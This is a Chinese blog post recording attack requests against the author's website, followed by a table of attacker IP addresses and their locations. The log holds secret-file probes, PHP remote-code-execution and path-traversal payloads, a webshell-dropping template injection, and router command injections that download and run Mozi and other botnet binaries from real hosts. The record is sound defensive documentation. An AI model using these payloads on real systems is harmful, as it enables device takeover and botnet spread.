一介闲人
一介闲人
记录自己网站中被攻击的一些例子,执行方式为通过域名后缀携带执行代码的方式进行攻击尝试。
域名使用 http://www.test.com 作为展示使用。
http://www.test.com/bak.zip
http://www.test.com/backup_11062022.tar
http://www.test.com/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello
http://www.test.com/solr/admin/cores?action=STATUS&wt=json
http://www.test.com//vendor/phpunit/phpunit/phpunit.xsd
http://www.test.com/.svn/wc.db
http://www.test.com/robots.txt
http://www.test.com/.env
http://www.test.com/.env.example
http://www.test.com/.env.backup
http://www.test.com/core/.git/config
http://www.test.com/s/7313e2033323e2131313e27343/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties
http://www.test.com/ttd.exe
http://www.test.com/cgi-bin/login.cgi
http://www.test.com/cgi-bin/luci/;stok=/locale
http://www.test.com/cgi-bin/jarrewrite.sh
http://www.test.com/.vscode/sftp.json
http://www.test.com/login.jsp
http://www.test.com/manage/account/login
http://www.test.com/systembc/password.php
http://www.test.com/.well-known/security.txt
http://www.test.com/wp-includes/wlwmanifest.xml
http://www.test.com/xmlrpc.php
http://www.test.com/Tva1
http://www.test.com/.DS_Store
http://www.test.com/cf_scripts/scripts/ajax/ckeditor/ckeditor.js
http://www.test.com/aab9
http://www.test.com/_profiler/phpinfo
http://www.test.com/videos/vts/20230726/d9/14/4d5cb760df60039c3feb18b24ba13a1c.ts
http://www.test.com/bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
http://www.test.com/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://www.test.com/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F94.156.79.129%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh)
http://www.test.com/?tag&tagstpl=news.html&tag={pbohome/Indexot:if((get/*-*/(/**/t))/**/(get/*-*/(/**/t1),get/*-*/(/**/t2)(get/*-*/(/**/t3))))}ok{/pbohome/Indexot:if}&t=file_put_contents&t1=b5ac9b2ee49f0ee2aa0db9db957dc613.php&t2=file_get_contents&t3=https://xingzuo.zhlgch.compbcms.txt
http://www.test.com/s/7313e2033323e2131313e27343/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties
http://www.test.com/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?echo(md5("hi"));?>+/tmp/index1.php
http://www.test.com/index.php?lang=../../../../../../../../tmp/index1
http://www.test.com/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello
http://www.test.com/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
http://www.test.com/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.17.217%3A88%2Ft%7Csh%3B%60)
http://www.test.com/index/ajax/lang?lang=../../application/database
http://www.test.com/dns-query?dns=sJQBAAABAAAAAAAAB2V4YW1wbGUDY29tAAABAAE
http://www.test.com/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input
http://www.test.com/index.php?acti=search&g=global&s=api&name=content_news.html&f=database&suffix=html&c=api&key=id&m=template&usr=admin&catid=+keywords%3Drule+titles%3Drule+action%3Dcache+name%3Durlrule.%2A%2A%2A%41%2A%2A%72%2A%52%2A%2A%61%2A%59%2A%28%2A%2A%2A%65%2A%78%2A%2A%69%2A%2A%74%2A%2A%28%2A%2A%24%2A_%2A%2A%70%2A%61%2A%2A%2A%72%2A%61%2A%2A%6D%2A%29%2A%2A%29%2A%2A&cat%5Bpid%5D=+keywords%3Drule+titles%3Drule+action%3Dcache+name%3Durlrule.%2A%2A%2A%41%2A%2A%72%2A%52%2A%2A%61%2A%59%2A%28%2A%2A%2A%65%2A%78%2A%2A%69%2A%2A%74%2A%2A%28%2A%2A%24%2A_%2A%2A%70%2A%61%2A%2A%2A%72%2A%61%2A%2A%6D%2A%29%2A%2A%29%2A%2A&index%5Bid%5D=+keywords%3Drule+titles%3Drule+action%3Dcache+name%3Durlrule.%2A%2A%2A%41%2A%2A%72%2A%52%2A%2A%61%2A%59%2A%28%2A%2A%2A%65%2A%78%2A%2A%69%2A%2A%74%2A%2A%28%2A%2A%24%2A_%2A%2A%70%2A%61%2A%2A%2A%72%2A%61%2A%2A%6D%2A%29%2A%2A%29%2A%2A&searchid=+keywords%3Drule+titles%3Drule+action%3Dcache+name%3Durlrule.%2A%2A%2A%41%2A%2A%72%2A%52%2A%2A%61%2A%59%2A%28%2A%2A%2A%65%2A%78%2A%2A%69%2A%2A%74%2A%2A%28%2A%2A%24%2A_%2A%2A%70%2A%61%2A%2A%2A%72%2A%61%2A%2A%6D%2A%29%2A%2A%29%2A%2A&urlrule=+keywords%3Drule+titles%3Drule+action%3Dcache+name%3Durlrule.%2A%2A%2A%41%2A%2A%72%2A%52%2A%2A%61%2A%59%2A%28%2A%2A%2A%65%2A%78%2A%2A%69%2A%2A%74%2A%2A%28%2A%2A%24%2A_%2A%2A%70%2A%61%2A%2A%2A%72%2A%61%2A%2A%6D%2A%29%2A%2A%29%2A%2A&form_table=+keywords%3Drule+titles%3Drule+action%3Dcache+name%3Durlrule.%2A%2A%2A%41%2A%2A%72%2A%52%2A%2A%61%2A%59%2A%28%2A%2A%2A%65%2A%78%2A%2A%69%2A%2A%74%2A%2A%28%2A%2A%24%2A_%2A%2A%70%2A%61%2A%2A%2A%72%2A%61%2A%2A%6D%2A%29%2A%2A%29%2A%2A
http://www.test.com/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application
本文将持续更新,内容仅作为记录展示以及防范使用,禁止做非法用途,后果自行自行承担
记录攻击过的IP,基本是国际的肉机,国内的也基本是地区的电信代理商公有IP,不能直接禁用,不然可能造成该地区无法正常访问。曾出现阿里云的IP,不过阿里云拒绝提供该IP的其他信息给个人,没造成什么损失,不予追究,若是有造成损失,可报有关机关调取信息。下面是具体的记录。
IP地址 | 真实地址 | 经度 | 纬度 |
---|---|---|---|
43.138.241.199 | 中国北京市海淀 | 116.302 | 39.9786 |
120.85.113.193 | 中国广东广州市[联通] | 113.2539 | 23.1181 |
113.215.189.97 | 中国浙江省澧浦镇[华数] | 119.789 | 29.1416 |
113.215.189.226 | 中国浙江省澧浦镇[华数] | 119.789 | 29.1416 |
106.75.6.251 | 中国上海Yangpu [UCLOUD] | 121.508 | 31.2999 |
103.194.186.10 | 香港中西區Sheung Wan | 114.149 | 22.2862 |
94.156.65.8 | 保加利亚Plovdiv卡爾洛沃 | 24.7995 | 42.627 |
31.220.1.83 | 荷兰北荷兰省阿姆斯特丹 | 4.90414 | 52.3676 |
80.94.92.60 | 荷兰北荷兰省阿姆斯特丹 | 4.90414 | 52.3676 |
91.92.249.4 | 荷兰北荷兰省阿姆斯特丹 | 4.90414 | 52.3676 |
128.90.170.21 | 波兰Mazovia华沙 | 20.9846 | 52.1828 |
45.124.84.224 | 越南北寧省Phúc Lai | 20.9652 | 105.79 |
51.222.253.2 | 新加坡Central Singapore新加坡 | 103.851 | 1.28141 |
128.199.222.142 | 新加坡South West新加坡 | 103.695 | 1.32123 |
78.153.140.177 | 英国英格兰伦敦 | -0.093 | 51.5088 |
78.153.140.224 | 英国英格兰伦敦 | -0.093 | 51.5088 |
78.153.140.175 | 英国英格兰伦敦 | -0.093 | 51.5088 |
78.153.140.222 | 英国英格兰伦敦 | -0.093 | 51.5088 |
195.191.219.130 | 英国英格兰伦敦 | -0.1196 | 51.5074 |
185.164.121.40 | 德国黑森州法兰克福 | 8.7321 | 50.1093 |
45.142.182.92 | 德国北莱茵-威斯特法伦于巴赫-帕伦贝格 | 6.11938 | 50.9199 |
148.153.56.86 | 美国加州洛杉矶 | -118.2441 | 34.0544 |
148.153.45.234 | 美国加州洛杉矶 | -118.2441 | 34.0544 |
54.164.169.144 | 美国弗吉尼亚州Ashburn | -77.4874 | 39.0438 |
142.202.48.16 | 美国纽约州纽约 | -74.0059 | 40.7127 |
34.239.164.71 | 美国弗吉尼亚州Ashburn | -77.4874 | 39.0438 |
52.167.144.67 | 美国弗吉尼亚州Boydton | -78.37471 | 36.677696 |
162.216.150.228 | 美国南卡罗来纳州查尔斯顿 | -80.013 | 32.8771 |
204.12.231.82 | 美国密苏里州堪薩斯城 | -94.5786 | 39.1374 |
64.225.59.234 | 美国新泽西州克利夫頓 | -74.1403 | 40.8364 |
194.38.23.16 | 乌克兰Dnipropetrovsk Oblast聶伯城 | 35.046 | 48.4735 |
65.109.134.233 | 芬兰新地区赫尔辛基 | 24.9344 | 60.1797 |
43.158.217.137 | 印度马哈拉施特拉邦Mumbai | 72.8776 | 19.0759 |
179.43.143.42 | 瑞士苏黎世州苏黎世 | 8.5163 | 47.3934 |
8.211.162.45 | 日本东京都东京 | 139.6899 | 35.6893 |
80.14.8.244 | 法国法兰西岛奥贝维埃 | 2.38405 | 48.9123 |
54.36.148.247 | 法国上法兰西大区鲁贝 | 3.20157 | 50.6917 |
评论